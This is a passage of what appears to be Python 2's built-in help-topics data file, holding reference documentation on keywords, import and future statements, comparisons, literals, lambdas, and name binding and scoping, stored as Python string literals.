identifier ::= (letter|"_") (letter | digit | "_")*\n' ' letter ::= lowercase | uppercase\n' ' lowercase ::= "a"..."z"\n' ' uppercase ::= "A"..."Z"\n' ' digit ::= "0"..."9"\n' '\n' 'Identifiers are unlimited in length. Case is significant.\n' '\n' '\n' 'Keywords\n' '========\n' '\n' 'The following identifiers are used as reserved words, or ' '*keywords* of\n' 'the language, and cannot be used as ordinary identifiers. ' 'They must\n' 'be spelled exactly as written here:\n' '\n' ' and del from not while\n' ' as elif global or with\n' ' assert else if pass yield\n' ' break except import print\n' ' class exec in raise\n' ' continue finally is return\n' ' def for lambda try\n' '\n' 'Changed in version 2.4: "None" became a constant and is now ' 'recognized\n' 'by the compiler as a name for the built-in object "None". ' 'Although it\n' 'is not a keyword, you cannot assign a different object to ' 'it.\n' '\n' 'Changed in version 2.5: Using "as" and "with" as identifiers ' 'triggers\n' 'a warning. To use them as keywords, enable the ' '"with_statement"\n' 'future feature .\n' '\n' 'Changed in version 2.6: "as" and "with" are full keywords.\n' '\n' '\n' 'Reserved classes of identifiers\n' '===============================\n' '\n' 'Certain classes of identifiers (besides keywords) have ' 'special\n' 'meanings. These classes are identified by the patterns of ' 'leading and\n' 'trailing underscore characters:\n' '\n' '"_*"\n' ' Not imported by "from module import *". The special ' 'identifier "_"\n' ' is used in the interactive interpreter to store the result ' 'of the\n' ' last evaluation; it is stored in the "__builtin__" ' 'module. When\n' ' not in interactive mode, "_" has no special meaning and is ' 'not\n' ' defined. See section The import statement.\n' '\n' ' Note: The name "_" is often used in conjunction with\n' ' internationalization; refer to the documentation for ' 'the\n' ' "gettext" module for more information on this ' 'convention.\n' '\n' '"__*__"\n' ' System-defined names. These names are defined by the ' 'interpreter\n' ' and its implementation (including the standard library). ' 'Current\n' ' system names are discussed in the Special method names ' 'section and\n' ' elsewhere. More will likely be defined in future versions ' 'of\n' ' Python. *Any* use of "__*__" names, in any context, that ' 'does not\n' ' follow explicitly documented use, is subject to breakage ' 'without\n' ' warning.\n' '\n' '"__*"\n' ' Class-private names. Names in this category, when used ' 'within the\n' ' context of a class definition, are re-written to use a ' 'mangled form\n' ' to help avoid name clashes between "private" attributes of ' 'base and\n' ' derived classes. See section Identifiers (Names).\n', 'if': '\n' 'The "if" statement\n' '******************\n' '\n' 'The "if" statement is used for conditional execution:\n' '\n' ' if_stmt ::= "if" expression ":" suite\n' ' ( "elif" expression ":" suite )*\n' ' ["else" ":" suite]\n' '\n' 'It selects exactly one of the suites by evaluating the expressions ' 'one\n' 'by one until one is found to be true (see section Boolean operations\n' 'for the definition of true and false); then that suite is executed\n' '(and no other part of the "if" statement is executed or evaluated).\n' 'If all expressions are false, the suite of the "else" clause, if\n' 'present, is executed.\n', 'imaginary': '\n' 'Imaginary literals\n' '******************\n' '\n' 'Imaginary literals are described by the following lexical ' 'definitions:\n' '\n' ' imagnumber ::= (floatnumber | intpart) ("j" | "J")\n' '\n' 'An imaginary literal yields a complex number with a real part ' 'of 0.0.\n' 'Complex numbers are represented as a pair of floating point ' 'numbers\n' 'and have the same restrictions on their range. To create a ' 'complex\n' 'number with a nonzero real part, add a floating point number to ' 'it,\n' 'e.g., "(3+4j)". Some examples of imaginary literals:\n' '\n' ' 3.14j 10.j 10j .001j 1e100j 3.14e-10j\n', 'import': '\n' 'The "import" statement\n' '**********************\n' '\n' ' import_stmt ::= "import" module ["as" name] ( "," module ' '["as" name] )*\n' ' | "from" relative_module "import" identifier ' '["as" name]\n' ' ( "," identifier ["as" name] )*\n' ' | "from" relative_module "import" "(" ' 'identifier ["as" name]\n' ' ( "," identifier ["as" name] )* [","] ")"\n' ' | "from" module "import" "*"\n' ' module ::= (identifier ".")* identifier\n' ' relative_module ::= "."* module | "."+\n' ' name ::= identifier\n' '\n' 'Import statements are executed in two steps: (1) find a module, ' 'and\n' 'initialize it if necessary; (2) define a name or names in the ' 'local\n' 'namespace (of the scope where the "import" statement occurs). The\n' 'statement comes in two forms differing on whether it uses the ' '"from"\n' 'keyword. The first form (without "from") repeats these steps for ' 'each\n' 'identifier in the list. The form with "from" performs step (1) ' 'once,\n' 'and then performs step (2) repeatedly.\n' '\n' 'To understand how step (1) occurs, one must first understand how\n' 'Python handles hierarchical naming of modules. To help organize\n' 'modules and provide a hierarchy in naming, Python has a concept ' 'of\n' 'packages. A package can contain other packages and modules while\n' 'modules cannot contain other modules or packages. From a file ' 'system\n' 'perspective, packages are directories and modules are files.\n' '\n' 'Once the name of the module is known (unless otherwise specified, ' 'the\n' 'term "module" will refer to both packages and modules), searching ' 'for\n' 'the module or package can begin. The first place checked is\n' '"sys.modules", the cache of all modules that have been imported\n' 'previously. If the module is found there then it is used in step ' '(2)\n' 'of import.\n' '\n' 'If the module is not found in the cache, then "sys.meta_path" is\n' 'searched (the specification for "sys.meta_path" can be found in ' '**PEP\n' '302**). The object is a list of *finder* objects which are queried ' 'in\n' 'order as to whether they know how to load the module by calling ' 'their\n' '"find_module()" method with the name of the module. If the module\n' 'happens to be contained within a package (as denoted by the ' 'existence\n' 'of a dot in the name), then a second argument to "find_module()" ' 'is\n' 'given as the value of the "__path__" attribute from the parent ' 'package\n' '(everything up to the last dot in the name of the module being\n' 'imported). If a finder can find the module it returns a *loader*\n' '(discussed later) or returns "None".\n' '\n' 'If none of the finders on "sys.meta_path" are able to find the ' 'module\n' 'then some implicitly defined finders are queried. Implementations ' 'of\n' 'Python vary in what implicit meta path finders are defined. The ' 'one\n' 'they all do define, though, is one that handles "sys.path_hooks",\n' '"sys.path_importer_cache", and "sys.path".\n' '\n' 'The implicit finder searches for the requested module in the ' '"paths"\n' 'specified in one of two places ("paths" do not have to be file ' 'system\n' 'paths). If the module being imported is supposed to be contained\n' 'within a package then the second argument passed to ' '"find_module()",\n' '"__path__" on the parent package, is used as the source of paths. ' 'If\n' 'the module is not contained in a package then "sys.path" is used ' 'as\n' 'the source of paths.\n' '\n' 'Once the source of paths is chosen it is iterated over to find a\n' 'finder that can handle that path. The dict at\n' '"sys.path_importer_cache" caches finders for paths and is checked ' 'for\n' 'a finder. If the path does not have a finder cached then\n' '"sys.path_hooks" is searched by calling each object in the list ' 'with a\n' 'single argument of the path, returning a finder or raises\n' '"ImportError". If a finder is returned then it is cached in\n' '"sys.path_importer_cache" and then used for that path entry. If ' 'no\n' 'finder can be found but the path exists then a value of "None" is\n' 'stored in "sys.path_importer_cache" to signify that an implicit, ' 'file-\n' 'based finder that handles modules stored as individual files ' 'should be\n' 'used for that path. If the path does not exist then a finder ' 'which\n' 'always returns "None" is placed in the cache for the path.\n' '\n' 'If no finder can find the module then "ImportError" is raised.\n' 'Otherwise some finder returned a loader whose "load_module()" ' 'method\n' 'is called with the name of the module to load (see **PEP 302** for ' 'the\n' 'original definition of loaders). A loader has several ' 'responsibilities\n' 'to perform on a module it loads. First, if the module already ' 'exists\n' 'in "sys.modules" (a possibility if the loader is called outside of ' 'the\n' 'import machinery) then it is to use that module for initialization ' 'and\n' 'not a new module. But if the module does not exist in ' '"sys.modules"\n' 'then it is to be added to that dict before initialization begins. ' 'If\n' 'an error occurs during loading of the module and it was added to\n' '"sys.modules" it is to be removed from the dict. If an error ' 'occurs\n' 'but the module was already in "sys.modules" it is left in the ' 'dict.\n' '\n' 'The loader must set several attributes on the module. "__name__" ' 'is to\n' 'be set to the name of the module. "__file__" is to be the "path" ' 'to\n' 'the file unless the module is built-in (and thus listed in\n' '"sys.builtin_module_names") in which case the attribute is not ' 'set. If\n' 'what is being imported is a package then "__path__" is to be set ' 'to a\n' 'list of paths to be searched when looking for modules and ' 'packages\n' 'contained within the package being imported. "__package__" is ' 'optional\n' 'but should be set to the name of package that contains the module ' 'or\n' 'package (the empty string is used for module not contained in a\n' 'package). "__loader__" is also optional but should be set to the\n' 'loader object that is loading the module.\n' '\n' 'If an error occurs during loading then the loader raises ' '"ImportError"\n' 'if some other exception is not already being propagated. Otherwise ' 'the\n' 'loader returns the module that was loaded and initialized.\n' '\n' 'When step (1) finishes without raising an exception, step (2) can\n' 'begin.\n' '\n' 'The first form of "import" statement binds the module name in the\n' 'local namespace to the module object, and then goes on to import ' 'the\n' 'next identifier, if any. If the module name is followed by "as", ' 'the\n' 'name following "as" is used as the local name for the module.\n' '\n' 'The "from" form does not bind the module name: it goes through ' 'the\n' 'list of identifiers, looks each one of them up in the module found ' 'in\n' 'step (1), and binds the name in the local namespace to the object ' 'thus\n' 'found. As with the first form of "import", an alternate local ' 'name\n' 'can be supplied by specifying ""as" localname". If a name is not\n' 'found, "ImportError" is raised. If the list of identifiers is\n' 'replaced by a star ("\'*\'"), all public names defined in the ' 'module are\n' 'bound in the local namespace of the "import" statement..\n' '\n' 'The *public names* defined by a module are determined by checking ' 'the\n' 'module\'s namespace for a variable named "__all__"; if defined, it ' 'must\n' 'be a sequence of strings which are names defined or imported by ' 'that\n' 'module. The names given in "__all__" are all considered public ' 'and\n' 'are required to exist. If "__all__" is not defined, the set of ' 'public\n' "names includes all names found in the module's namespace which do " 'not\n' 'begin with an underscore character ("\'_\'"). "__all__" should ' 'contain\n' 'the entire public API. It is intended to avoid accidentally ' 'exporting\n' 'items that are not part of the API (such as library modules which ' 'were\n' 'imported and used within the module).\n' '\n' 'The "from" form with "*" may only occur in a module scope. If ' 'the\n' 'wild card form of import --- "import *" --- is used in a function ' 'and\n' 'the function contains or is a nested block with free variables, ' 'the\n' 'compiler will raise a "SyntaxError".\n' '\n' 'When specifying what module to import you do not have to specify ' 'the\n' 'absolute name of the module. When a module or package is ' 'contained\n' 'within another package it is possible to make a relative import ' 'within\n' 'the same top package without having to mention the package name. ' 'By\n' 'using leading dots in the specified module or package after "from" ' 'you\n' 'can specify how high to traverse up the current package hierarchy\n' 'without specifying exact names. One leading dot means the current\n' 'package where the module making the import exists. Two dots means ' 'up\n' 'one package level. Three dots is up two levels, etc. So if you ' 'execute\n' '"from . import mod" from a module in the "pkg" package then you ' 'will\n' 'end up importing "pkg.mod". If you execute "from ..subpkg2 import ' 'mod"\n' 'from within "pkg.subpkg1" you will import "pkg.subpkg2.mod". The\n' 'specification for relative imports is contained within **PEP ' '328**.\n' '\n' '"importlib.import_module()" is provided to support applications ' 'that\n' 'determine which modules need to be loaded dynamically.\n' '\n' '\n' 'Future statements\n' '=================\n' '\n' 'A *future statement* is a directive to the compiler that a ' 'particular\n' 'module should be compiled using syntax or semantics that will be\n' 'available in a specified future release of Python. The future\n' 'statement is intended to ease migration to future versions of ' 'Python\n' 'that introduce incompatible changes to the language. It allows ' 'use of\n' 'the new features on a per-module basis before the release in which ' 'the\n' 'feature becomes standard.\n' '\n' ' future_statement ::= "from" "__future__" "import" feature ["as" ' 'name]\n' ' ("," feature ["as" name])*\n' ' | "from" "__future__" "import" "(" feature ' '["as" name]\n' ' ("," feature ["as" name])* [","] ")"\n' ' feature ::= identifier\n' ' name ::= identifier\n' '\n' 'A future statement must appear near the top of the module. The ' 'only\n' 'lines that can appear before a future statement are:\n' '\n' '* the module docstring (if any),\n' '\n' '* comments,\n' '\n' '* blank lines, and\n' '\n' '* other future statements.\n' '\n' 'The features recognized by Python 2.6 are "unicode_literals",\n' '"print_function", "absolute_import", "division", "generators",\n' '"nested_scopes" and "with_statement". "generators", ' '"with_statement",\n' '"nested_scopes" are redundant in Python version 2.6 and above ' 'because\n' 'they are always enabled.\n' '\n' 'A future statement is recognized and treated specially at compile\n' 'time: Changes to the semantics of core constructs are often\n' 'implemented by generating different code. It may even be the ' 'case\n' 'that a new feature introduces new incompatible syntax (such as a ' 'new\n' 'reserved word), in which case the compiler may need to parse the\n' 'module differently. Such decisions cannot be pushed off until\n' 'runtime.\n' '\n' 'For any given release, the compiler knows which feature names ' 'have\n' 'been defined, and raises a compile-time error if a future ' 'statement\n' 'contains a feature not known to it.\n' '\n' 'The direct runtime semantics are the same as for any import ' 'statement:\n' 'there is a standard module "__future__", described later, and it ' 'will\n' 'be imported in the usual way at the time the future statement is\n' 'executed.\n' '\n' 'The interesting runtime semantics depend on the specific feature\n' 'enabled by the future statement.\n' '\n' 'Note that there is nothing special about the statement:\n' '\n' ' import __future__ [as name]\n' '\n' "That is not a future statement; it's an ordinary import statement " 'with\n' 'no special semantics or syntax restrictions.\n' '\n' 'Code compiled by an "exec" statement or calls to the built-in\n' 'functions "compile()" and "execfile()" that occur in a module "M"\n' 'containing a future statement will, by default, use the new ' 'syntax or\n' 'semantics associated with the future statement. This can, ' 'starting\n' 'with Python 2.2 be controlled by optional arguments to "compile()" ' '---\n' 'see the documentation of that function for details.\n' '\n' 'A future statement typed at an interactive interpreter prompt ' 'will\n' 'take effect for the rest of the interpreter session. If an\n' 'interpreter is started with the "-i" option, is passed a script ' 'name\n' 'to execute, and the script includes a future statement, it will be ' 'in\n' 'effect in the interactive session started after the script is\n' 'executed.\n' '\n' 'See also:\n' '\n' ' **PEP 236** - Back to the __future__\n' ' The original proposal for the __future__ mechanism.\n', 'in': '\n' 'Comparisons\n' '***********\n' '\n' 'Unlike C, all comparison operations in Python have the same priority,\n' 'which is lower than that of any arithmetic, shifting or bitwise\n' 'operation. Also unlike C, expressions like "a < b < c" have the\n' 'interpretation that is conventional in mathematics:\n' '\n' ' comparison ::= or_expr ( comp_operator or_expr )*\n' ' comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n' ' | "is" ["not"] | ["not"] "in"\n' '\n' 'Comparisons yield boolean values: "True" or "False".\n' '\n' 'Comparisons can be chained arbitrarily, e.g., "x < y <= z" is\n' 'equivalent to "x < y and y <= z", except that "y" is evaluated only\n' 'once (but in both cases "z" is not evaluated at all when "x < y" is\n' 'found to be false).\n' '\n' 'Formally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n' '*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\n' 'opN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\n' 'that each expression is evaluated at most once.\n' '\n' 'Note that "a op1 b op2 c" doesn\'t imply any kind of comparison ' 'between\n' '*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\n' 'perhaps not pretty).\n' '\n' 'The forms "<>" and "!=" are equivalent; for consistency with C, "!="\n' 'is preferred; where "!=" is mentioned below "<>" is also accepted.\n' 'The "<>" spelling is considered obsolescent.\n' '\n' 'The operators "<", ">", "==", ">=", "<=", and "!=" compare the values\n' 'of two objects. The objects need not have the same type. If both are\n' 'numbers, they are converted to a common type. Otherwise, objects of\n' 'different types *always* compare unequal, and are ordered ' 'consistently\n' 'but arbitrarily. You can control comparison behavior of objects of\n' 'non-built-in types by defining a "__cmp__" method or rich comparison\n' 'methods like "__gt__", described in section Special method names.\n' '\n' '(This unusual definition of comparison was used to simplify the\n' 'definition of operations like sorting and the "in" and "not in"\n' 'operators. In the future, the comparison rules for objects of\n' 'different types are likely to change.)\n' '\n' 'Comparison of objects of the same type depends on the type:\n' '\n' '* Numbers are compared arithmetically.\n' '\n' '* Strings are compared lexicographically using the numeric\n' ' equivalents (the result of the built-in function "ord()") of their\n' ' characters. Unicode and 8-bit strings are fully interoperable in\n' ' this behavior. [4]\n' '\n' '* Tuples and lists are compared lexicographically using comparison\n' ' of corresponding elements. This means that to compare equal, each\n' ' element must compare equal and the two sequences must be of the ' 'same\n' ' type and have the same length.\n' '\n' ' If not equal, the sequences are ordered the same as their first\n' ' differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n' ' the same as "cmp(x,y)". If the corresponding element does not\n' ' exist, the shorter sequence is ordered first (for example, "[1,2] <\n' ' [1,2,3]").\n' '\n' '* Mappings (dictionaries) compare equal if and only if their sorted\n' ' (key, value) lists compare equal. [5] Outcomes other than equality\n' ' are resolved consistently, but are not otherwise defined. [6]\n' '\n' '* Most other objects of built-in types compare unequal unless they\n' ' are the same object; the choice whether one object is considered\n' ' smaller or larger than another one is made arbitrarily but\n' ' consistently within one execution of a program.\n' '\n' 'The operators "in" and "not in" test for collection membership. "x ' 'in\n' 's" evaluates to true if *x* is a member of the collection *s*, and\n' 'false otherwise. "x not in s" returns the negation of "x in s". The\n' 'collection membership test has traditionally been bound to sequences;\n' 'an object is a member of a collection if the collection is a sequence\n' 'and contains an element equal to that object. However, it make sense\n' 'for many other object types to support membership tests without being\n' 'a sequence. In particular, dictionaries (for keys) and sets support\n' 'membership testing.\n' '\n' 'For the list and tuple types, "x in y" is true if and only if there\n' 'exists an index *i* such that either "x is y[i]" or "x == y[i]" is\n' 'true.\n' '\n' 'For the Unicode and string types, "x in y" is true if and only if *x*\n' 'is a substring of *y*. An equivalent test is "y.find(x) != -1".\n' 'Note, *x* and *y* need not be the same type; consequently, "u\'ab\' ' 'in\n' '\'abc\'" will return "True". Empty strings are always considered to be ' 'a\n' 'substring of any other string, so """ in "abc"" will return "True".\n' '\n' 'Changed in version 2.3: Previously, *x* was required to be a string ' 'of\n' 'length "1".\n' '\n' 'For user-defined classes which define the "__contains__()" method, "x\n' 'in y" is true if and only if "y.__contains__(x)" is true.\n' '\n' 'For user-defined classes which do not define "__contains__()" but do\n' 'define "__iter__()", "x in y" is true if some value "z" with "x == z"\n' 'is produced while iterating over "y". If an exception is raised\n' 'during the iteration, it is as if "in" raised that exception.\n' '\n' 'Lastly, the old-style iteration protocol is tried: if a class defines\n' '"__getitem__()", "x in y" is true if and only if there is a non-\n' 'negative integer index *i* such that "x == y[i]", and all lower\n' 'integer indices do not raise "IndexError" exception. (If any other\n' 'exception is raised, it is as if "in" raised that exception).\n' '\n' 'The operator "not in" is defined to have the inverse true value of\n' '"in".\n' '\n' 'The operators "is" and "is not" test for object identity: "x is y" is\n' 'true if and only if *x* and *y* are the same object. "x is not y"\n' 'yields the inverse truth value. [7]\n', 'integers': '\n' 'Integer and long integer literals\n' '*********************************\n' '\n' 'Integer and long integer literals are described by the ' 'following\n' 'lexical definitions:\n' '\n' ' longinteger ::= integer ("l" | "L")\n' ' integer ::= decimalinteger | octinteger | hexinteger | ' 'bininteger\n' ' decimalinteger ::= nonzerodigit digit* | "0"\n' ' octinteger ::= "0" ("o" | "O") octdigit+ | "0" octdigit+\n' ' hexinteger ::= "0" ("x" | "X") hexdigit+\n' ' bininteger ::= "0" ("b" | "B") bindigit+\n' ' nonzerodigit ::= "1"..."9"\n' ' octdigit ::= "0"..."7"\n' ' bindigit ::= "0" | "1"\n' ' hexdigit ::= digit | "a"..."f" | "A"..."F"\n' '\n' 'Although both lower case "\'l\'" and upper case "\'L\'" are ' 'allowed as\n' 'suffix for long integers, it is strongly recommended to always ' 'use\n' '"\'L\'", since the letter "\'l\'" looks too much like the digit ' '"\'1\'".\n' '\n' 'Plain integer literals that are above the largest representable ' 'plain\n' 'integer (e.g., 2147483647 when using 32-bit arithmetic) are ' 'accepted\n' 'as if they were long integers instead. [1] There is no limit ' 'for long\n' 'integer literals apart from what can be stored in available ' 'memory.\n' '\n' 'Some examples of plain integer literals (first row) and long ' 'integer\n' 'literals (second and third rows):\n' '\n' ' 7 2147483647 0177\n' ' 3L 79228162514264337593543950336L 0377L 0x100000000L\n' ' 79228162514264337593543950336 0xdeadbeef\n', 'lambda': '\n' 'Lambdas\n' '*******\n' '\n' ' lambda_expr ::= "lambda" [parameter_list]: expression\n' ' old_lambda_expr ::= "lambda" [parameter_list]: old_expression\n' '\n' 'Lambda expressions (sometimes called lambda forms) have the same\n' 'syntactic position as expressions. They are a shorthand to ' 'create\n' 'anonymous functions; the expression "lambda arguments: ' 'expression"\n' 'yields a function object. The unnamed object behaves like a ' 'function\n' 'object defined with\n' '\n' ' def name(arguments):\n' ' return expression\n' '\n' 'See section Function definitions for the syntax of parameter ' 'lists.\n' 'Note that functions created with lambda expressions cannot ' 'contain\n' 'statements.\n', 'lists': '\n' 'List displays\n' '*************\n' '\n' 'A list display is a possibly empty series of expressions enclosed ' 'in\n' 'square brackets:\n' '\n' ' list_display ::= "[" [expression_list | ' 'list_comprehension] "]"\n' ' list_comprehension ::= expression list_for\n' ' list_for ::= "for" target_list "in" ' 'old_expression_list [list_iter]\n' ' old_expression_list ::= old_expression [("," old_expression)+ ' '[","]]\n' ' old_expression ::= or_test | old_lambda_expr\n' ' list_iter ::= list_for | list_if\n' ' list_if ::= "if" old_expression [list_iter]\n' '\n' 'A list display yields a new list object. Its contents are ' 'specified\n' 'by providing either a list of expressions or a list comprehension.\n' 'When a comma-separated list of expressions is supplied, its ' 'elements\n' 'are evaluated from left to right and placed into the list object ' 'in\n' 'that order. When a list comprehension is supplied, it consists of ' 'a\n' 'single expression followed by at least one "for" clause and zero ' 'or\n' 'more "for" or "if" clauses. In this case, the elements of the new\n' 'list are those that would be produced by considering each of the ' '"for"\n' 'or "if" clauses a block, nesting from left to right, and ' 'evaluating\n' 'the expression to produce a list element each time the innermost ' 'block\n' 'is reached [1].\n', 'naming': '\n' 'Naming and binding\n' '******************\n' '\n' '*Names* refer to objects. Names are introduced by name binding\n' 'operations. Each occurrence of a name in the program text refers ' 'to\n' 'the *binding* of that name established in the innermost function ' 'block\n' 'containing the use.\n' '\n' 'A *block* is a piece of Python program text that is executed as a\n' 'unit. The following are blocks: a module, a function body, and a ' 'class\n' 'definition. Each command typed interactively is a block. A ' 'script\n' 'file (a file given as standard input to the interpreter or ' 'specified\n' 'on the interpreter command line the first argument) is a code ' 'block.\n' 'A script command (a command specified on the interpreter command ' 'line\n' "with the '**-c**' option) is a code block. The file read by the\n" 'built-in function "execfile()" is a code block. The string ' 'argument\n' 'passed to the built-in function "eval()" and to the "exec" ' 'statement\n' 'is a code block. The expression read and evaluated by the ' 'built-in\n' 'function "input()" is a code block.\n' '\n' 'A code block is executed in an *execution frame*. A frame ' 'contains\n' 'some administrative information (used for debugging) and ' 'determines\n' "where and how execution continues after the code block's execution " 'has\n' 'completed.\n' '\n' 'A *scope* defines the visibility of a name within a block. If a ' 'local\n' 'variable is defined in a block, its scope includes that block. If ' 'the\n' 'definition occurs in a function block, the scope extends to any ' 'blocks\n' 'contained within the defining one, unless a contained block ' 'introduces\n' 'a different binding for the name. The scope of names defined in ' 'a\n' 'class block is limited to the class block; it does not extend to ' 'the\n' 'code blocks of methods -- this includes generator expressions ' 'since\n' 'they are implemented using a function scope. This means that the\n' 'following will fail:\n' '\n' ' class A:\n' ' a = 42\n' ' b = list(a + i for i in range(10))\n' '\n' 'When a name is used in a code block, it is resolved using the ' 'nearest\n' 'enclosing scope. The set of all such scopes visible to a code ' 'block\n' "is called the block's *environment*.\n" '\n' 'If a name is bound in a block, it is a local variable of that ' 'block.\n' 'If a name is bound at the module level, it is a global variable. ' '(The\n' 'variables of the module code block are local and global.) If a\n' 'variable is used in a code block but not defined there, it is a ' '*free\n' 'variable*.\n' '\n' 'When a name is not found at all, a "NameError" exception is ' 'raised.\n' 'If the name refers to a local variable that has not been bound, a\n' '"UnboundLocalError" exception is raised. "UnboundLocalError" is ' 'a\n' 'subclass of "NameError".\n' '\n' 'The following constructs bind names: formal parameters to ' 'functions,\n' '"import" statements, class and function definitions (these bind ' 'the\n' 'class or function name in the defining block), and targets that ' 'are\n' 'identifiers if occurring in an assignment, "for" loop header, in ' 'the\n' 'second position of an "except" clause header or after "as" in a ' '"with"\n' 'statement. The "import" statement of the form "from ... import ' '*"\n' 'binds all names defined in the imported module, except those ' 'beginning\n' 'with an underscore. This form may only be used at the module ' 'level.\n' '\n' 'A target occurring in a "del" statement is also considered bound ' 'for\n' 'this purpose (though the actual semantics are to unbind the ' 'name). It\n' 'is illegal to unbind a name that is referenced by an enclosing ' 'scope;\n' 'the compiler will report a "SyntaxError".\n' '\n' 'Each assignment or import statement occurs within a block defined ' 'by a\n' 'class or function definition or at the module level (the ' 'top-level\n' 'code block).\n' '\n' 'If a name binding operation occurs anywhere within a code block, ' 'all\n' 'uses of the name within the block are treated as references to ' 'the\n' 'current block. This can lead to errors when a name is used within ' 'a\n' 'block before it is bound. This rule is subtle. Python lacks\n' 'declarations and allows name binding operations to occur anywhere\n' 'within a code block. The local variables of a code block can be\n' 'determined by scanning the entire text of the block for name ' 'binding\n' 'operations.\n' '\n' 'If the global statement occurs within a block, all uses of the ' 'name\n' 'specified in the statement refer to the binding of that name in ' 'the\n' 'top-level namespace. Names are resolved in the top-level namespace ' 'by\n' 'searching the global namespace, i.e. the namespace of the module\n' 'containing the code block, and the builtins namespace, the ' 'namespace\n' 'of the module "__builtin__". The global namespace is searched ' 'first.\n' 'If the name is not found there, the builtins namespace is ' 'searched.\n' 'The global statement must precede all uses of the name.\n' '\n' 'The builtins namespace associated with the execution of a code ' 'block\n' 'is actually found by looking up the name "__builtins__" in its ' 'global\n' 'namespace; this should be a dictionary or a module (in the latter ' 'case\n' "the module's dictionary is used). By default, when in the " '"__main__"\n' 'module, "__builtins__" is the built-in module "__builtin__" (note: ' 'no\n' '\'s\'); when in any other module, "__builtins__" is an alias for ' 'the\n' 'dictionary of the "__builtin__" module itself. "__builtins__" can ' 'be\n' 'set to a user-created dictionary to create a weak form of ' 'restricted\n' 'execution.\n' '\n' '**CPython implementation detail:** Users should not touch\n' '"__builtins__"; it is strictly an implementation detail. Users\n' 'wanting to override values in the builtins namespace should ' '"import"\n' 'the "__builtin__" (no \'s\') module and modify its attributes\n' 'appropriately.\n' '\n' 'The namespace for a module is automatically created the first time ' 'a\n' 'module is imported. The main module for a script is always ' 'called\n' '"__main__".\n' '\n' 'The "global" statement has the same scope as a name binding ' 'operation\n' 'in the same block. If the nearest enclosing scope for a free ' 'variable\n' 'contains a global statement, the free variable is treated as a ' 'global.\n' '\n' 'A class definition is an executable statement that may use and ' 'define\n' 'names. These references follow the normal rules for name ' 'resolution.\n' 'The namespace of the class definition becomes the attribute ' 'dictionary\n' 'of the class. Names defined at the class scope are not visible ' 'in\n' 'methods.\n' '\n' '\n' 'Interaction with dynamic features\n' '=================================\n' '\n' 'There are several cases where Python statements are illegal when ' 'used\n' 'in conjunction with nested scopes that contain free variables.\n' '\n' 'If a variable is referenced in an enclosing scope, it is illegal ' 'to\n' 'delete the name. An error will be reported at compile time.\n' '\n' 'If the wild card form of import --- "import *" --- is used in a\n' 'function and the function contains or is a nested block with free\n' 'variables, the compiler will raise a "SyntaxError".\n' '\n' 'If "exec" is used in a function and the function contains or is a\n' 'nested block with free variables, the compiler will raise a\n' '"SyntaxError" unless the exec explicitly specifies the local ' 'namespace\n' 'for the "exec". (In other words, "exec obj" would be illegal, ' 'but\n' '"exec obj in ns" would be legal.)\n' '\n' 'The "eval()", "execfile()", and "input()" functions and the ' '"exec"\n' 'statement do not have access to the full environment for ' 'resolving\n' 'names. Names may be resolved in the local and global namespaces ' 'of\n' 'the caller. Free variables are not resolved in the nearest ' 'enclosing\n' 'namespace, but in the global namespace. [1] The "exec" statement ' 'and\n' 'the "eval()" and "execfile()" functions have optional arguments ' 'to\n' 'override the global and local namespace. If only one namespace ' 'is\n' 'specified, it is used for both.\n', 'numbers': '\n' 'Numeric literals\n' '****************\n' '\n' 'There are four types of numeric literals: plain integers, long\n' 'integers, floating point numbers, and imaginary numbers. There ' 'are no\n' 'complex literals (complex numbers can be formed by adding a real\n' 'number and an imaginary number).\n' '\n' 'Note that numeric literals do not include a sign; a phrase like ' '"-1"\n' 'is actually an expression composed of the unary operator \'"-"\' ' 'and the\n' 'literal "1".\n', 'numeric-types': '\n' 'Emulating numeric types\n' '***********************\n' '\n' 'The following methods can be defined to emulate numeric ' 'objects.\n' 'Methods corresponding to operations that are not supported ' 'by the\n' 'particular kind of number implemented (e.g., bitwise ' 'operations for\n' 'non-integral numbers) should be left undefined.\n' '\n' 'object.__add__(self, other)\n' 'object.__sub__(self, other)\n' 'object.__mul__(self, other)\n' 'object.__floordiv__(self, other)\n' 'object.__mod__(self, other)\n' 'object.__divmod__(self, other)\n' 'object.__pow__(self, other[, modulo])\n' 'object.__lshift__(self, other)\n' 'object.__rshift__(self, other)\n' 'object.__and__(self, other)\n' 'object.__xor__(self, other)\n' 'object.__or__(self, other)\n' '\n' ' These methods are called to implement the binary ' 'arithmetic\n' ' operations ("+", "-", "*", "//", "%", "divmod()", ' '"pow()", "**",\n' ' "<<", ">>", "&", "^", "|"). For instance, to evaluate ' 'the\n' ' expression "x + y", where *x* is an instance of a class ' 'that has an\n' ' "__add__()" method, "x.__add__(y)" is called. The ' '"__divmod__()"\n' ' method should be the equivalent to using ' '"__floordiv__()" and\n' ' "__mod__()"; it should not be related to "__truediv__()" ' '(described\n' ' below). Note that "__pow__()" should be defined to ' 'accept an\n' ' optional third argument if the ternary version of the ' 'built-in\n' ' "pow()" function is to be supported.\n' '\n' ' If one of those methods does not support the operation ' 'with the\n' ' supplied arguments, it should return "NotImplemented".\n' '\n' 'object.__div__(self, other)\n' 'object.__truediv__(self, other)\n' '\n' ' The division operator ("/") is implemented by these ' 'methods. The\n' ' "__truediv__()" method is used when ' '"__future__.division" is in\n' ' effect, otherwise "__div__()" is used. If only one of ' 'these two\n' ' methods is defined, the object will not support division ' 'in the\n' ' alternate context; "TypeError" will be raised instead.\n' '\n' 'object.__radd__(self, other)\n' 'object.__rsub__(self, other)\n' 'object.__rmul__(self, other)\n' 'object.__rdiv__(self, other)\n' 'object.__rtruediv__(self, other)\n' 'object.__rfloordiv__(self, other)\n' 'object.__rmod__(self, other)\n' 'object.__rdivmod__(self, other)\n' 'object.__rpow__(self, other)\n' 'object.__rlshift__(self, other)\n' 'object.__rrshift__(self, other)\n' 'object.__rand__(self, other)\n' 'object.__rxor__(self, other)\n' 'object.__ror__(self, other)\n' '\n' ' These methods are called to implement the binary ' 'arithmetic\n' ' operations ("+", "-", "*", "/", "%", "divmod()", ' '"pow()", "**",\n' ' "<<", ">>", "&", "^", "|") with reflected (swapped) ' 'operands.\n' ' These functions are only called if the left operand does ' 'not\n' ' support the corresponding operation and the operands are ' 